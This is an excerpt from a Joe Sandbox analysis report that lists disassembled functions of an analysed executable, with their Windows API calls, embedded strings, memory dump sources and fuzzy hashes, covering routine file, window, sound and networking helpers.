                                                                                              • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                              Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                              • String ID:
                                                                                              • API String ID: 461458858-0
                                                                                              • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                              • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                              • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                              • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                              Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                              • DeleteObject.GDI32(?), ref: 004301D0
                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3969911579-0
                                                                                              • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                              • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                              • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                              • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                              Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                              • String ID: 0
                                                                                              • API String ID: 956284711-4108050209
                                                                                              • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                              • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                              • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                              • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                              Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 1965227024-3771769585
                                                                                              • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                              • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                              • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                              • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                              Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_memmove_wcslen
                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                              • API String ID: 369157077-1007645807
                                                                                              • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                              • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                              • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                              • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                              Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 00445BF8
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                              • __wcsicoll.LIBCMT ref: 00445C33
                                                                                              • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 3125838495-3381328864
                                                                                              • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                              • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                              • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                              • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                              Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                              • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                              • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                              • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                              • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CharNext
                                                                                              • String ID:
                                                                                              • API String ID: 1350042424-0
                                                                                              • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                              • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                              • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                              • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                              Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                              • _wcscpy.LIBCMT ref: 004787E5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                              • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                              • API String ID: 3052893215-2127371420
                                                                                              • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                              • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                              • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                              • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                              Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                              • __swprintf.LIBCMT ref: 0045E7F7
                                                                                              • _wprintf.LIBCMT ref: 0045E8B3
                                                                                              • _wprintf.LIBCMT ref: 0045E8D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 2295938435-2354261254
                                                                                              • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                              • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                              • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                              • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                              Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                              • API String ID: 3038501623-2263619337
                                                                                              • Opcode ID: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                                                                              • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                              • Opcode Fuzzy Hash: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                                                                              • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                              Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                              • __swprintf.LIBCMT ref: 0045E5F6
                                                                                              • _wprintf.LIBCMT ref: 0045E6A3
                                                                                              • _wprintf.LIBCMT ref: 0045E6C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 2295938435-8599901
                                                                                              • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                              • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                              • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                              • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                              Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00443B67
                                                                                                • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                              • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                              • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                              • IsWindow.USER32(?), ref: 00443C3A
                                                                                              • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                              • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                              • String ID: BUTTON
                                                                                              • API String ID: 1834419854-3405671355
                                                                                              • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                              • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                              • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                              • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                              Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                              • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • _wprintf.LIBCMT ref: 00454074
                                                                                              • __swprintf.LIBCMT ref: 004540A3
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
